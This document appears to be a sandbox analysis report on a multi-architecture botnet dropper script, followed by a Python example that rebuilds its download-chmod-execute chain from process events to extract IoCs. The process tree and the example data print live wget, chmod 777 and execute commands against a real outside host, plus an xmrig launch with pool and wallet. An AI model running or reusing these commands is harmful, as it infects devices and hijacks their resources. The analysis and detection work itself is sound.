Analysis
max time kernel: 150s
max time network: 95s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 09-11-2024 04:09
Static task: static1
Behavioral task: behavioral1 (sample tyo2831qq.sh, resource ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample tyo2831qq.sh, resource debian9-armhf-20240418-en)
Behavioral task: behavioral3 (sample tyo2831qq.sh, resource debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (sample tyo2831qq.sh, resource debian9-mipsel-20240418-en)
General
Target: tyo2831qq.sh
Size: 1KB
MD5: e12d6a1166c4e290ed4ba39f96c780ad
SHA1: 57038253b27c0312102758d25a77b5d1859cba3e
SHA256: 5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
SHA512: 276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Signatures

File and Directory Permissions Modification (1 TTP, 12 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod, PIDs 713, 724, 731, 738, 743, 748, 752, 756, 760, 764, 770, 776

Executes dropped EXE (1 IoC)
Processes: /tmp/bots (PID 726, bots)

Reads system routing table (1 TTP, 1 IoC)
Gets active network interfaces from /proc virtual filesystem.
Processes: tyo2831qq.mips opened /proc/net/route for reading

Reads system network configuration (1 TTP, 1 IoC)
Uses contents of /proc filesystem to enumerate network settings.
Processes: tyo2831qq.mips opened /proc/net/route for reading

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes: wget (PID 701), tyo2831qq.mips (PID 714), rm (PID 774)

Writes file to tmp directory (11 IoCs)
Malware often drops required files in the /tmp directory.
Processes: wget opened the following files for modification:
  /tmp/tyo2831qq.x86
  /tmp/tyo2831qq.i586
  /tmp/tyo2831qq.m68k
  /tmp/tyo2831qq.mips
  /tmp/bots
  /tmp/tyo2831qq.mpsl
  /tmp/tyo2831qq.sh4
  /tmp/tyo2831qq.arm6
  /tmp/tyo2831qq.x32
  /tmp/tyo2831qq.ppc
  /tmp/tyo2831qq.arm7
Processes
(depth 1)
PID 697  /tmp/tyo2831qq.sh: /tmp/tyo2831qq.sh
(depth 2, children of PID 697)
  PID 701  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.mips  [System Network Configuration Discovery; Writes file to tmp directory]
  PID 713  /bin/chmod: chmod 777 tyo2831qq.mips  [File and Directory Permissions Modification]
  PID 714  /tmp/tyo2831qq.mips: ./tyo2831qq.mips  [Reads system routing table; Reads system network configuration; System Network Configuration Discovery]
  PID 718  /usr/bin/wget: wget http://31.172.80.237/bots  [Writes file to tmp directory]
  PID 724  /bin/chmod: chmod 777 bots  [File and Directory Permissions Modification]
  PID 726  /tmp/bots: ./bots  [Executes dropped EXE]
  PID 728  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.mpsl  [Writes file to tmp directory]
  PID 731  /bin/chmod: chmod 777 tyo2831qq.mpsl  [File and Directory Permissions Modification]
  PID 732  /tmp/tyo2831qq.mpsl: ./tyo2831qq.mpsl
  PID 735  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.sh4  [Writes file to tmp directory]
  PID 738  /bin/chmod: chmod 777 tyo2831qq.sh4  [File and Directory Permissions Modification]
  PID 739  /tmp/tyo2831qq.sh4: ./tyo2831qq.sh4
  PID 742  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.x86  [Writes file to tmp directory]
  PID 743  /bin/chmod: chmod 777 tyo2831qq.x86  [File and Directory Permissions Modification]
  PID 744  /tmp/tyo2831qq.x86: ./tyo2831qq.x86
  PID 747  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.arm6  [Writes file to tmp directory]
  PID 748  /bin/chmod: chmod 777 tyo2831qq.arm6  [File and Directory Permissions Modification]
  PID 749  /tmp/tyo2831qq.arm6: ./tyo2831qq.arm6
  PID 751  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.x32  [Writes file to tmp directory]
  PID 752  /bin/chmod: chmod 777 tyo2831qq.x32  [File and Directory Permissions Modification]
  PID 753  /tmp/tyo2831qq.x32: ./tyo2831qq.x32
  PID 755  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.ppc  [Writes file to tmp directory]
  PID 756  /bin/chmod: chmod 777 tyo2831qq.ppc  [File and Directory Permissions Modification]
  PID 757  /tmp/tyo2831qq.ppc: ./tyo2831qq.ppc
  PID 759  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.i586  [Writes file to tmp directory]
  PID 760  /bin/chmod: chmod 777 tyo2831qq.i586  [File and Directory Permissions Modification]
  PID 761  /tmp/tyo2831qq.i586: ./tyo2831qq.i586
  PID 763  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.m68k  [Writes file to tmp directory]
  PID 764  /bin/chmod: chmod 777 tyo2831qq.m68k  [File and Directory Permissions Modification]
  PID 765  /tmp/tyo2831qq.m68k: ./tyo2831qq.m68k
  PID 767  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.spc
  PID 768  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.arm4
  PID 769  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.arm7  [Writes file to tmp directory]
  PID 770  /bin/chmod: chmod 777 tyo2831qq.arm7  [File and Directory Permissions Modification]
  PID 771  /tmp/tyo2831qq.arm7: ./tyo2831qq.arm7
  PID 773  /usr/bin/wget: wget http://31.172.80.237/tyo2831qq.arm5
  PID 774  /bin/rm: rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86  [System Network Configuration Discovery]
  PID 775  /usr/bin/wget: wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig
  PID 776  /bin/chmod: chmod 777 xmrig  [File and Directory Permissions Modification]
  PID 777  /tmp/xmrig: ./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B
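The process tree above is the complete kill chain of a Mirai-family multi-architecture dropper: for each CPU build the script fetches a payload from 31.172.80.237 into /tmp, marks it chmod 777, executes it, then deletes the staged files with rm -rf (including itself), and finally fetches an xmrig build from GitHub and launches it against pool.hashvault.pro:80 with a hard-coded Monero wallet. Note that the wget processes for the .spc, .arm4, .arm5 and xmrig fetches carry no "Writes file to tmp directory" signature in this run, so those payloads were not observed landing on disk. The following Python is an added example, not part of the sandbox report or of the sample, that reconstructs this download → chmod → execute pattern from process events of the shape (pid, ppid, exe, cmdline) and pulls out the hosts, targeted architectures, self-cleanup and miner IoCs. The event list is constructed from the report's process tree (abridged), and the function names are this example's own.

```python
"""Reconstruct a multi-architecture dropper chain and extract IoCs from
process events (pid, ppid, exe, cmdline). Added example; the EVENTS data
below is constructed from the sandbox report's process tree, abridged to one
per-arch chain, the 'bots' chain, one failed fetch, the cleanup and the miner."""
import re
from collections import defaultdict
from urllib.parse import urlparse

EVENTS = [
    (697, 1, "/tmp/tyo2831qq.sh", "/tmp/tyo2831qq.sh"),
    (701, 697, "/usr/bin/wget", "wget http://31.172.80.237/tyo2831qq.mips"),
    (713, 697, "/bin/chmod", "chmod 777 tyo2831qq.mips"),
    (714, 697, "/tmp/tyo2831qq.mips", "./tyo2831qq.mips"),
    (718, 697, "/usr/bin/wget", "wget http://31.172.80.237/bots"),
    (724, 697, "/bin/chmod", "chmod 777 bots"),
    (726, 697, "/tmp/bots", "./bots"),
    (767, 697, "/usr/bin/wget", "wget http://31.172.80.237/tyo2831qq.spc"),
    (774, 697, "/bin/rm", "rm -rf tyo2831qq.mips tyo2831qq.sh tyo2831qq.spc"),
    (775, 697, "/usr/bin/wget",
     "wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig"),
    (776, 697, "/bin/chmod", "chmod 777 xmrig"),
    (777, 697, "/tmp/xmrig",
     "./xmrig --url pool.hashvault.pro:80 --user "
     "48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7"
     " --pass bos -B"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Standard Monero address: 95 base58 characters, first char 4 (8 for subaddresses).
XMR_ADDR_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# Filename suffixes Mirai-family droppers iterate over when spraying builds at a host.
ARCH_SUFFIXES = {"x86", "x32", "i586", "mips", "mpsl", "arm", "arm4", "arm5",
                 "arm6", "arm7", "ppc", "m68k", "sh4", "spc"}


def basename(path):
    return path.rsplit("/", 1)[-1]


def analyze(events):
    """Group children by parent and, per parent, correlate wget targets with
    chmod targets and executions out of /tmp. Returns completed chains,
    fetches that never reached chmod+exec, contacted hosts, targeted
    architectures, whether the dropper deleted its own payloads, and miner details."""
    by_parent = defaultdict(list)
    for pid, ppid, exe, cmd in events:
        by_parent[ppid].append((pid, exe, cmd))

    out = {"chains": [], "attempted_only": [], "hosts": set(),
           "arches": set(), "cleanup": False, "miner": None}
    for children in by_parent.values():
        downloaded, chmodded, executed = {}, set(), set()
        for pid, exe, cmd in children:
            argv = cmd.split()
            tool = basename(exe)
            if tool == "wget":
                for url in URL_RE.findall(cmd):
                    parsed = urlparse(url)
                    out["hosts"].add(parsed.netloc)
                    downloaded[basename(parsed.path)] = url
            elif tool == "chmod" and len(argv) >= 3 and argv[1] in ("777", "+x", "a+x"):
                chmodded.update(argv[2:])
            elif tool == "rm" and any(a in downloaded for a in argv):
                out["cleanup"] = True  # dropper removing the files it just fetched
            elif exe.startswith("/tmp/") and argv and argv[0].startswith("./"):
                executed.add(basename(argv[0]))
                if "--url" in argv:  # miner launch: pool and wallet on the command line
                    wallet = XMR_ADDR_RE.search(cmd)
                    out["miner"] = {"binary": tool,
                                    "pool": argv[argv.index("--url") + 1],
                                    "wallet": wallet.group(0) if wallet else None}
        for name, url in downloaded.items():
            suffix = name.rpartition(".")[2]
            if suffix in ARCH_SUFFIXES:
                out["arches"].add(suffix)
            if name in chmodded and name in executed:
                out["chains"].append((name, url))
            else:
                out["attempted_only"].append(name)
    return out


if __name__ == "__main__":
    for key, value in analyze(EVENTS).items():
        print(f"{key}: {value}")
```

Correlating by parent PID rather than by filename alone matters here: the same wget/chmod/./name triple issued by one shell is the dropper signature, whereas those commands scattered across unrelated parents are routine administration. On a live host the same logic can be fed from auditd execve records or eBPF exec tracing, and the extracted hosts, pool endpoint and wallet address go straight into blocklists and hunting queries.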
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 16KB
MD5: 2615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA1: 4286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256: e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512: b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78